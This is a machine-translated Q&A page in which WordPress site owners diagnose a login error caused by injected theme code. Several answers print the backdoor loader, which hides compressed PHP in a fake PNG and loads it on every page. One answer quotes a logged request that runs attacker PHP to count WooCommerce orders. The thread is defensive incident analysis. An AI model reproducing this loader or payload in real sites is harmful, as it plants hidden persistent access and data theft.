WordPress管理登录出错,但网站正常运行。

huangapple go评论68阅读模式
英文:

WordPress admin login throws error but site is working fine

问题

抱歉,我不能提供代码翻译。

英文:

I am running a WordPress WooCommerce site. The site is running fine but I go to admin page and login, it throws the following error below. What is strange is that I can't find any reference to this function wplicense_update_check

> Fatal error: Uncaught TypeError: call_user_func_array(): Argument #1 ($callback) must be a valid callback, function "wplicense_update_check" not found or invalid function name in /home/mysite/public_html/wp-includes/class-wp-hook.php:308
>
> Stack trace:
#0 /home/mysite/public_html/wp-includes/class-wp-hook.php(332): WP_Hook->apply_filters(NULL, Array)
#1 /home/mysite/public_html/wp-includes/plugin.php(517): WP_Hook->do_action(Array)
#2 /home/mysite/public_html/wp-settings.php(639): do_action('wp_loaded')
#3 /home/mysite/public_html/wp-config.php(108): require_once('/home/mysite...')
#4 /home/mysite/public_html/wp-load.php(50): require_once('/home/mysite...')
#5 /home/mysite/public_html/wp-blog-header.php(13): require_once('/home/mysite...')
#6 /home/mysite/public_html/index.php(17): require('/home/mysite...')
#7 {main} thrown in /home/mysite/public_html/wp-includes/class-wp-hook.php on line 308

答案1

得分: 1

审查主题文件夹中的 functions.php 文件,在我的情况下,我有以下代码并直接删除它:

add_action( 'wp_loaded', 'wplicense_update_check' );

if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {

    function wplicense_update_check() {
        /**
         * 许可证更新检查挂钩
         *
         * 注册主题更新检查挂钩。
         *
         */

        $wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
        $wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );

        if (is_file($wplicense_updater)) {
            load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
        }
    }
}

只返回翻译好的部分,不包括代码部分。

英文:

review file functions.php of the theme folder, in my case I have this code and directly delete it:

add_action( 'wp_loaded', 'wplicense_update_check' );

if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {

	function wplicense_update_check() {
		/**
		 * License Update Checker Hook
		 *
		 * Register theme update checker hook.
		 *
		 */
		
		$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
		$wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );

		if (is_file($wplicense_updater)) {
			load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
		}
	}
}

答案2

得分: 1

I've also found this code in a child theme functions.php - which I know every line of. It should not be there.

它还在子主题的functions.php中找到了这段代码 - 我知道它的每一行。它不应该在那里。

It loads an option from the database which is serialized as:

它从数据库中加载一个选项,这个选项被序列化为:

a:5:{i:0;s:10:"screenshot";i:1;s:3:"png";i:2;s:4:"zlib";i:3;s:4:"main";i:4;s:8:"compress";}

when de serialized it returns

解序列化后,它返回

Array
(
    [0] => screenshot
    [1] => png
    [2] => zlib
    [3] => main
    [4] => compress
)

Parts of this is then passed to the locate_template function to find the file: screenshot-main.png which is located in the child theme directory - it's definitely not a PNG though.

然后,这部分内容传递给locate_template函数以查找文件:screenshot-main.png,该文件位于子主题目录中 - 但它绝对不是一个PNG文件。

Submission to Virus total comes up clean but decompressing it with 7zip shows the PHP content.

提交到Virus total没有发现病毒,但使用7zip解压缩它会显示PHP内容。

It appears to be a zTDS implementation as it shares a lot of the same code - this appears to redirect visitors who are not logged in and not bots.

看起来这是zTDS的实现,因为它分享了很多相同的代码 - 这似乎会将未登录的访问者重定向,而不是机器人。

https://ztds.info/doku.php?id=folders

https://ztds.info/doku.php?id=folders

英文:

I've also found this code in a child theme functions.php - which I know every line of. It should not be there.

It loads an option from the database which is serialized as:

a:5:{i:0;s:10:"screenshot";i:1;s:3:"png";i:2;s:4:"zlib";i:3;s:4:"main";i:4;s:8:"compress";}

when de serialized it returns

Array
(
    [0] => screenshot
    [1] => png
    [2] => zlib
    [3] => main
    [4] => compress
)

Parts of this is then passed to the locate_template function to find the file: screenshot-main.png which is located in the child theme directory - it's definitely not a PNG though.

Submission to Virus total comes up clean but decompressing it with 7zip shows the PHP content.

https://pastebin.mozilla.org/Wro62iM2 (added to archive.org too)

It appears to be a zTDS implementation as it shares a lot of the same code - this appears to redirect visitors who are not logged in and not bots.

https://ztds.info/doku.php?id=folders

答案3

得分: 0

这很奇怪。我刚刚在一个网站上遇到了一个问题,并在主题的functions.php文件中找到了以下代码...

add_action( 'wp_loaded', 'wplicense_update_check' );

if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {

    function wplicense_update_check() {
        /**
         * License Update Checker Hook
         *
         * Register theme update checker hook.
         *
         */
        
        $wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
        $wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );

        if (is_file($wplicense_updater)) {
            load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
        }
    }
}

...导致了WP中的致命错误。我没有添加这段代码,也不知道它是如何出现在我的functions.php文件中的。

英文:

This is odd. I have just had an issue with a site and have found the following code in the themes functions.php file …

add_action( 'wp_loaded', 'wplicense_update_check' );

if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {

	function wplicense_update_check() {
		/**
		 * License Update Checker Hook
		 *
		 * Register theme update checker hook.
		 *
		 */
		
		$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
		$wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );

		if (is_file($wplicense_updater)) {
			load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
		}
	}
}

… was causing a fatal error in WP. I did not add the code and have no idea how it ended up in my functions.php file.

答案4

得分: 0

更新 - 在移除代码后再次在functions.php中找到了它。

由于在if语句中缺少了 **&& ! is_user_logged_in()**,所以代码略有不同:

add_action( 'wp_loaded', 'wplicense_update_check' );

if ( ! function_exists( 'wplicense_update_check' ) ) {
	function wplicense_update_check() {
		/**
		 * 许可证更新检查挂钩
		 *
		 * 注册主题更新检查挂钩。
		 *
		 */
		$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
		if ($wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] )) {
			load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
		}
	}
}
英文:

Update - just found the code in functions.php again after having removed it.

The code is slightly different as it is missing && ! is_user_logged_in() from the if statement:

add_action( 'wp_loaded', 'wplicense_update_check' );

if ( ! function_exists( 'wplicense_update_check' ) ) {
	function wplicense_update_check() {
		/**
		 * License Update Checker Hook
		 *
		 * Register theme update checker hook.
		 *
		 */
		$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
		if ($wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] )) {
			load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
		}
	}
}

答案5

得分: 0

我已经成功记录了一个可疑请求的POST参数,尽管我不能确定这是否来自相同的操作者,但请求签名看起来是相同的:

172.70.189.147 - - [24/Apr/2023:12:30:51 +0000] "POST /index.php?RqPbeX2VLP HTTP/2.0" 200 332 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" "111.90.150.162" "--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22xxx\x22\x0D\x0A\x0D\x0A5\x0D\x0A--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22aaa\x22\x0D\x0A\x0D\x0Aif(isset($wpdb)) { $results = $wpdb->get_results(\x22SELECT ID FROM {$wpdb->prefix}posts WHERE post_type LIKE 'shop_order' AND post_date LIKE '\x22.date('Y-m-d',strtotime(\x22-1 days\x22)).\x22%' AND post_status='wc-completed'\x22); echo(count($results)); exit(); } else { echo('nodb?');exit(); }\x0D\x0A--------------------------06e40a1b50125bf5--\x0D\x0A"

我考虑尝试在安装了WPWeb Updater的情况下运行这段代码,看它是否执行。

英文:

I've managed to log the POST parameters of one of the suspicious looking requests though I can't be sure this is from the same actor, the request signature looks the same:

172.70.189.147 - - [24/Apr/2023:12:30:51 +0000] "POST /index.php?RqPbeX2VLP HTTP/2.0" 200 332 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" "111.90.150.162" "--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22xxx\x22\x0D\x0A\x0D\x0A5\x0D\x0A--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22aaa\x22\x0D\x0A\x0D\x0Aif(isset($wpdb)) { $results = $wpdb->get_results(\x22SELECT ID FROM {$wpdb->prefix}posts WHERE post_type LIKE 'shop_order' AND post_date LIKE '\x22.date('Y-m-d',strtotime(\x22-1 days\x22)).\x22%' AND post_status='wc-completed'\x22); echo(count($results)); exit(); } else { echo('nodb?');exit(); }\x0D\x0A--------------------------06e40a1b50125bf5--\x0D\x0A"

I thought I might try this out with the WPWeb Updater installed to see it executes the code.

huangapple
  • 本文由 发表于 2023年2月18日 22:45:35
  • 转载请务必保留本文链接:https://go.coder-hub.com/75494103.html
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

确定